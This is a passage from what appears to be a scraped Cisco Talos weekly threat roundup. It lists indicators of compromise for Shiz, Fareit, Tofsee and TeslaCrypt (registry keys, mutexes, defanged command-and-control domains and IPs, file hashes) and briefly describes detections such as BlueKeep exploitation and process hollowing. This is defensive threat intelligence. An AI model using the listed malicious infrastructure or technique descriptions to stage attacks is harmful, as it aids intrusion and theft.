ThreatGrid\n\n[](<https://1.bp.blogspot.com/-9llWPKXg6GY/XVbNbl5VbdI/AAAAAAAACXY/d0CFv-y6C2I7su6FXSgShCoR2VvZXamDwCLcBGAs/s1600/688db1253d2dcdaf11bb2e8f03790dea9b10625b14b20531f4ea108801066f62_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Shiz-7108197-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT \nValue Name: 67497551a ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: 98b68e3c ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: userinit ` | 18 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: System ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: load ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS \nValue Name: run ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: userinit ` | 18 \nMutexes | Occurrences \n---|--- \n`Global\\674972E3a` | 18 \n`Global\\MicrosoftSysenterGate7` | 18 \n`internal_wutex_0x00000120` | 18 \n`internal_wutex_0x00000424` | 18 \n`internal_wutex_0x00000474` | 18 \n`internal_wutex_0x000004a0` | 18 \n`\\BaseNamedObjects\\Global\\C3D74C3Ba` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]253[.]126[.]58` | 18 \n`208[.]100[.]26[.]251` | 18 \n`104[.]239[.]157[.]210` | 18 \n`45[.]77[.]226[.]209` | 18 \n`198[.]187[.]30[.]249` | 14 \n`35[.]231[.]151[.]7` | 12 \n`13[.]107[.]21[.]200` | 10 \n`35[.]229[.]93[.]46` | 9 \n`204[.]79[.]197[.]200` | 8 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`MAMASUFEXIX[.]EU` | 18 \n`FODAVIBUSIM[.]EU` | 18 \n`LYKONURYMEX[.]EU` | 18 \n`qetoqolusex[.]eu` | 18 \n`PUPUCUVYMUP[.]EU` | 18 \n`vocupotusyz[.]eu` | 18 \n`gaherobusit[.]eu` | 18 \n`MAGOFETEQUB[.]EU` | 18 \n`RYCUCUGISIX[.]EU` | 18 \n`KEJYWAJAZOK[.]EU` | 18 \n`puvewevodek[.]eu` | 18 \n`gahyfesyqad[.]eu` | 18 \n`MAVEJYKIDIJ[.]EU` | 18 \n`lyvevonifun[.]eu` | 18 \n`rydopapifel[.]eu` | 18 \n`kemimojitir[.]eu` | 18 \n`CIQUKECYWIV[.]EU` | 18 \n`FOXOFEWUTEQ[.]EU` | 18 \n`tucyzogojat[.]eu` | 18 \n`JEJYKAXYMOB[.]EU` | 18 \n`QEKUSAGIGYZ[.]EU` | 18 \n`tuwypagupeb[.]eu` | 18 \n`FOBATESOHEK[.]EU` | 18 \n`NOVOMYFEXIJ[.]EU` | 18 \n`dixyjohevon[.]eu` | 18 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching [A-F0-9]{1,4}>.tmp` | 18 \n`%SystemRoot%\\AppPatch\\ffiqrh.exe` | 1 \n`%SystemRoot%\\AppPatch\\jshtht.exe` | 1 \n`%SystemRoot%\\AppPatch\\akumbd.exe` | 1 \n`%SystemRoot%\\AppPatch\\rkhhmxr.exe` | 1 \n`%SystemRoot%\\AppPatch\\pvsvlhr.exe` | 1 \n`%SystemRoot%\\AppPatch\\hcbpdh.exe` | 1 \n`%SystemRoot%\\AppPatch\\suupehv.exe` | 1 \n`%SystemRoot%\\AppPatch\\atvoia.exe` | 1 \n`%SystemRoot%\\AppPatch\\xyovdf.exe` | 1 \n`%SystemRoot%\\AppPatch\\qoatnug.exe` | 1 \n`%SystemRoot%\\AppPatch\\stfvdxf.exe` | 1 \n`%SystemRoot%\\AppPatch\\crsadq.exe` | 1 \n`%SystemRoot%\\AppPatch\\iqxtlwt.exe` | 1 \n`%SystemRoot%\\AppPatch\\vgabmas.exe` | 1 \n`%SystemRoot%\\AppPatch\\cxglomg.exe` | 1 \n`%SystemRoot%\\AppPatch\\mrfdmsf.exe` | 1 \n`%SystemRoot%\\AppPatch\\eodhsml.exe` | 1 \n`%SystemRoot%\\AppPatch\\bjihnwq.exe` | 1 \n \n#### File Hashes\n\n` 15e38b549194635dbbce0ddc2fa97744992498292843924d0ef12fb1804a285c 90fb3fc2fa229953c808954a8eec46b36f1edc0f41ab088c82ea755ffa3c43c2 9ca9c80c7aef1de747e8fb0fbe2fdabe0242862341eac562799b96f94830bd7a a798d57162ee4fac07d2e23a16f9d0557d39f6c615a33add2a8f570177ae250e b45da6a6c26ccecac46deeceed64bea1dc7753ebbd6fb93ad33048e0f8587f95 ba8e2507b98e11681912eb982779c5791bfd084f1683d0ec211f187c04444b4b bf6c06b4720c871f38fe90fc4c2dd2a17fd3879b37668facd78f433309123094 c0b1f1dcd503c8e254cbc80478848db14d2ab731df0a3d3cd185d5df43727d54 cab99b6945c6ee017c2297f13f5962ff2be066c3c9f4b812f1183334ab133de0 cefb5097f6431abfd8ecaa842f8fd18e7c37b585c90ed7dab5cc58c985f327ce d736eb2fa68eb8da82c3823e90bee6fb374f00d59b5ce26df9a8f8f6e807bf39 e4c8b631c928eec873f54c2811315e48962a8f5e067e3f820e22fbfbb04755eb e7df207595977cf6802d5d039c76a91ace32521f290d115c06325bb8a72ce18e ea0ea261f2a0211dc179b23bf18609749df13f024db3384cf1f7f54d09a3e21d ea9b003f2dd1f2293add17f6607370a130d3efff27d55c5068c7ac8abcbfb76b eeb8342fd7c3ee5b7bb9b714899dc0b2b97597562022015b9d1d2464e7cd55d3 fce2a9dee62b71966aca7874ff8f37066a0323c73e5e524162b36b114a92894f fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-INbzbMqgncM/XVbNu-EqnkI/AAAAAAAACXk/1AH5j9Zn4ngwkbFEFKmjAjo7h_26rIZOgCLcBGAs/s1600/fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-tMC4lirZBsQ/XVbNypEJNVI/AAAAAAAACXo/aiG82MvXQK8aKr_NtMJ8Bc_-4ORBuQBNgCLcBGAs/s1600/fdbae139d64ee88eacf6ade8b366666432bc944430ab7dd0cf1af7156cb7d316_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-GE6eLpprZfo/XVbN4cdsAyI/AAAAAAAACXs/0QeZIqU82vMaBmLk5x2XPwwkuDw93GzowCLcBGAs/s1600/3459368ab88453104477c3c4224193a9f10fc8a78ff3940665b8607c4bd13153_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (1553) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nKovter injection detected \\- (1465) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nProcess hollowing detected \\- (1288) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nMadshi injection detected \\- (1157) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nTrickbot malware detected \\- (742) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nDealply adware detected \\- (417) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nGamarue malware detected \\- (151) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (75) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (72) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nPowerShell file-less infection detected \\- (67) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \n \n", "modified": "2019-08-16T09:44:46", "published": "2019-08-16T09:44:46", "id": "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/Zt-_TgfJK3M/threat-roundup-0809-0816.html", "type": "talosblog", "title": "Threat Roundup for August 9 to August 16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-02T16:45:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between July 26 and Aug. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.\n\n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d444a0f0c20b.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Trojan.Fareit-7090291-0 | Trojan | The Fareit trojan is primarily an information stealer with functionality to download and install other malware. \nWin.Malware.Tofsee-7090196-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Ransomware.TeslaCrypt-7090181-1 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. \nWin.Virus.Parite-7090021-0 | Virus | Parite is a polymorphic file infector. It infects executable files on the local machine and network drives. \nWin.Malware.Remcos-7089920-1 | Malware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Kovter-7086582-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.Miner-7086571-0 | Dropper | This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html. \nWin.Trojan.Zegost-7086512-0 | Trojan | Zegost, also known as \"Zusy,\" uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Dropper.Ursnif-7083691-0 | Dropper | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Trojan.Fareit-7090291-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\Software\\WinRAR ` | 6 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 6 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 6 \nMutexes | Occurrences \n---|--- \n`Global\\b7b392a1-b3e0-11e9-a007-00501e3ae7b5` | 9 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`77[.]111[.]240[.]77` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`dkaul[.]su` | 3 \n`kglso[.]ru` | 3 \n`FFUEX[.]SU` | 3 \n`mmbild[.]se` | 3 \n`digitalimagellc[.]us` | 3 \n`PLNDIGITAL[.]ORG` | 3 \n`brettsplus[.]com[.]au` | 3 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 9 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9 \n`%System32%\\config\\SAM` | 6 \n`%TEMP%\\-959430038.bat` | 1 \n`%TEMP%\\94859.bat` | 1 \n`%TEMP%\\-958164199.bat` | 1 \n`%TEMP%\\-958105901.bat` | 1 \n`%TEMP%\\-958121813.bat` | 1 \n`%TEMP%\\-958085949.bat` | 1 \n`%TEMP%\\-958128100.bat` | 1 \n`%TEMP%\\86484.bat` | 1 \n`%TEMP%\\100125.bat` | 1 \n`%TEMP%\\92015.bat` | 1 \n`%TEMP%\\92140.bat` | 1 \n`%TEMP%\\93656.bat` | 1 \n \n#### File Hashes\n\n` 037dbde69db377adba75065b57b988175b883d5d22a0211f78cd8e3ea63a8c0b 04d401c93e8648d698044aa500afbe0d1ba2e6352b208bac1f31e65f3786a6f4 0a860e6eace6b4fb43c40e1d1ff5aa646771fbb890afc291da814f7a7b66a686 2c022ec86c02f2629ad5e6db757a2ee169a7071e5ad458afdaf42b7e8dd24d37 3680f7e4dcf0416edb86258c24c6d41aae1fa7a37b2eb26a829dd4979ec28810 37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831 912c9de409dee4bbfb4c29e4ef968e6df4a34e106ca49761b7ad47994f445f15 93669f7e7726bc9d4aaa24dcd8f84b0ccc30dbcefc974d6f4ea361179203c8e2 9d723fbcbb53a3b7f55cb1d6bcd9bd35d7f5eed752c90147cf6b9d72c2217409 9f38462f183111e0bff6672ac65485ce1d4593a31153f07d8cc9ce6f4edc6821 a67a928a736c05e48b977a0a2a140bd1ff2729b8d260a2dafae9871822cc14a3 c55d9bc607cf45dcc2fc66f6aca60d495ea4ac32c52828112e67a24761164fc7 d3dc4b97c1dda85f27401227881ce1f5267d6ceadf7f884b9e0264648f0687b1 dd563db1527d80f0b402fc44116a1de141d52226b245fa23e754b1b1e30514d9 f2399366114ae7a2567992ac96d06ca86f052bc0f90a4ccc3638807d2624de84 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gs4-ZkaslIY/XURDF3XnwpI/AAAAAAAAB4o/wfo2xqLsTcIAs-7WHpWtMG4ETWp1AKscQCEwYBhgL/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-gA88qSUJ5Gw/XURDXERyOvI/AAAAAAAAB4w/nF8L0cTFKVcM_P4-8Hfjwax7QjPVcnO9ACLcBGAs/s1600/37d97b05a5f046eaa1939c9eacca2f337a3239bb00cd4895772547c5bc738831_tg.png>)\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7090196-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\Shas ` | 36 \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\Qecs ` | 36 \n`<HKLM>\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NAPAGENT\\LOCALCONFIG\\Enroll\\HcsGroups ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NAPAGENT\\LOCALCONFIG\\UI ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 36 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 36 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\sraabisk ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SRAABISK \nValue Name: ImagePath ` | 6 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\poxxyfph ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\POXXYFPH \nValue Name: ImagePath ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\Java VM ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\VBA ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IME ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xwffgnxp ` | 3 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\XWFFGNXP \nValue Name: ImagePath ` | 3 \n`<HKCU>\\Software\\Microsoft\\<random, matching '[A-Z][a-z]{3,11}'> ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\Direct3D ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\TPG ` | 2 \nMutexes | Occurrences \n---|--- \n`Frz_State` | 3 \n`Sandboxie_SingleInstanceMutex_Control` | 3 \n`8C7EF2D18C62E966FAA2F103BC71DB04` | 3 \n`B76FD347C7201967BD7510FFC887D89D` | 3 \n`F81EAF302D1CAD1CD52C598895B98F49` | 3 \n`B55D882B6AD53F2630F641F93DBC6632` | 3 \n`DFD9CCD816EA09FA87380EE972D3FE0A` | 3 \n`947A2F20D44434751A1FD63E133D3883` | 3 \n`27F7FFA07BD0546DF3E613F21C61F3E9` | 3 \n`B159CDAF25784C79CB1C9F0CDF12E94C` | 3 \n`891B5C99F4D8068194399C87B72D54C6` | 3 \n`9EA2A5F4E10686779AD6C370F4D8A134` | 3 \n`A4F11C837EB2FB7FE5D4A9AAC3668D44` | 3 \n`FCC07BE63C5A293474A56972D25359B2` | 3 \n`\\BaseNamedObjects\\55316F50AA5F7C0AF74B646D5BA30B6C` | 1 \n`\\BaseNamedObjects\\F6634E1FD2EF7234AA9F24F39DA8C989` | 1 \n`\\BaseNamedObjects\\ED5F41B655CEDB95F08EE542BD539E90` | 1 \n`\\BaseNamedObjects\\FD509C28F9012AA4076303B64747B793` | 1 \n`\\BaseNamedObjects\\CD01D078DCB1643DC8E3667F120CAB40` | 1 \n`\\BaseNamedObjects\\6F9EA2070C7CC350EF1BF8B5AC5A9601` | 1 \n`\\BaseNamedObjects\\CA8A51536CF3D38C27A4072A756591C1` | 1 \n`\\BaseNamedObjects\\B3E288CBEA2F275076EA13D7EAA6AA2B` | 1 \n`\\BaseNamedObjects\\5904F95108046C70AE0DC46DD119468C` | 1 \n`\\BaseNamedObjects\\DAB8A830ADCB8D21D190CF3C585F3F91` | 1 \n`\\BaseNamedObjects\\DB628CF0707BDD5E042097FDB915669A` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`103[.]248[.]137[.]133` | 36 \n`111[.]121[.]193[.]242` | 36 \n`104[.]47[.]53[.]36` | 19 \n`104[.]47[.]54[.]36` | 17 \n`104[.]215[.]148[.]63` | 11 \n`40[.]112[.]72[.]205` | 9 \n`40[.]76[.]4[.]15` | 8 \n`40[.]113[.]200[.]201` | 5 \n`185[.]198[.]57[.]151` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 36 \n`gordinka[.]xyz` | 3 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 36 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 36 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 35 \n`%HOMEPATH%\\NTUSER.DAT` | 3 \n`%HOMEPATH%\\ntuser.dat.LOG1` | 3 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\webappsstore.tmp` | 1 \n`%TEMP%\\akylzxd.exe` | 1 \n`%TEMP%\\6656.bat` | 1 \n`%TEMP%\\2712.bat` | 1 \n`%TEMP%\\6820.bat` | 1 \n`%TEMP%\\6042.bat` | 1 \n`%TEMP%\\8737.bat` | 1 \n`%TEMP%\\7438.bat` | 1 \n`%TEMP%\\8443.bat` | 1 \n`%TEMP%\\0502.bat` | 1 \n`%TEMP%\\1752.bat` | 1 \n`%TEMP%\\6287.bat` | 1 \n`%TEMP%\\3440.bat` | 1 \n`%TEMP%\\8320.bat` | 1 \n`%TEMP%\\8476.bat` | 1 \n`%TEMP%\\2350.bat` | 1 \n`%TEMP%\\0526.bat` | 1 \n`%TEMP%\\3735.bat` | 1 \n`%TEMP%\\8143.bat` | 1 \n`%TEMP%\\8515.bat` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0272591f11ebfafde7cbb811ce4d4cc8d650956e8ea850c0751ac2f4de954138 0528c84d8c9003db021603719a7649c359221c6d7b2ad918726f8bf48f5cc5c9 06ffafb628585e4db0e5663baca4bd11378f6a381994fd55194f9f071c3c5a0c 0bcba9302e58883bb6dc4b68ebf28e0849845d4bbf469b08b465a0bee4d69bd3 12b98384530eb3f073a46c50a7ad0248389b11b2d6c508e33f71bbf034578aa0 18b39e415880a0c86ac92ccaeb4b69ca6aeb7d800661b03249b9e522903ed38c 1ad0c706365e29e30a208cb8058b3f8023ab9838e728b83de99412ca3015c6a2 2622d0798a83e1377c5a495b12e23e77bef09bcfb3b880aa521ca2b402ff5f4e 2691b34696328d028edab98a5dcaf3e5d492908c5ba0d16d8cdb8927dd614fcc 29393f713a89a7529e4e66793a042c349ea7967957b0c02b8c6b40f3f05b52d0 2c77eaf233dec2d3b165dccec7350c0b4653e0db550fb14c1d3571bbd1a4d403 2c9c2c4bdb923a21057cb24a54cd593f61af0b913215911db43a939b4550a9c5 3070f13f4d3db4bee1c37eeafb6de059d6e172a40bdef17e3a778a71176ddf6d 394cb2df083d3106b6e659fdd8ec27514a82c2c48d9b21aa189efcce6a321677 3a8a90823aee9b2fa6bd72548b7b69b5d1e0917fcf10065ade2c944eac9fd703 3e5723f2b6a2480d4b0a3aac03e457e8abf21ef72eab2bd5d7ced9908eec929c 3e9abc021820c1f954388b59dc5d6f9a48b6bf15a22168576fa007778f5fe6cb 4193bb216522035460434b367f699ac2211317bcf86f777709fe2d1ab01bf649 48118321467cab596dbb1f049f3fed4b6cee2621933124f1bb3d36db5ea7aaf6 4c10c671efd90d492b7ddc4a9a20e0d8ec306fb333710f20f698c533331c4c04 4ee8e166d1f8f358038947b9a0a1d2c4d552112e179fdfa536769a9e79b2bbfe 4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5 5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf 52d32a74235bdfac594154dedaf572d4cd38148016dc3ab4e4ae4c325b813bb7 556386fd0ca3000d635251734cfdffdbb4e8331c9c4ea6f576196f4a5fc3d21e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-z5EKnIrTjKo/XURDgQzROJI/AAAAAAAAB40/ktRI_ASY4NIgMmeAXpkrRiFiDASMquqoQCLcBGAs/s1600/f64709e66da43b034d3fcf8a771b379df280f11e2d341e0b0eeba867397da194_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-yr1-tPZ-9Bc/XURDlxX-5YI/AAAAAAAAB44/cZVrdRjs0XcBLBRoAbMwDFil8itA7WC8gCLcBGAs/s1600/4fe975be2d2cce5c26a849ea1d6d9342dfa79d332bed221736463427a45b22c5_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-yPLf_xET_X0/XURDq-WO_OI/AAAAAAAAB5A/z-WfuOAHizEhBNRXqsR7h3LQnweLCQgRgCLcBGAs/s1600/5090d89adf0523559aba758adb1bf3c1f1afe20e354242a96020c41816652cbf_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Ransomware.TeslaCrypt-7090181-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 13 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 13 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: Wallpaper ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: msconfig ` | 13 \nMutexes | Occurrences \n---|--- \n`dslhufdks3` | 13 \n`Global\\1e6e4b01-b3e8-11e9-a007-00501e3ae7b5` | 5 \n`\\BaseNamedObjects\\RAS_MO_02` | 2 \n`\\BaseNamedObjects\\Global\\ADAP_WMI_ENTRY` | 2 \n`\\BaseNamedObjects\\Global\\RAS_MO_01` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- 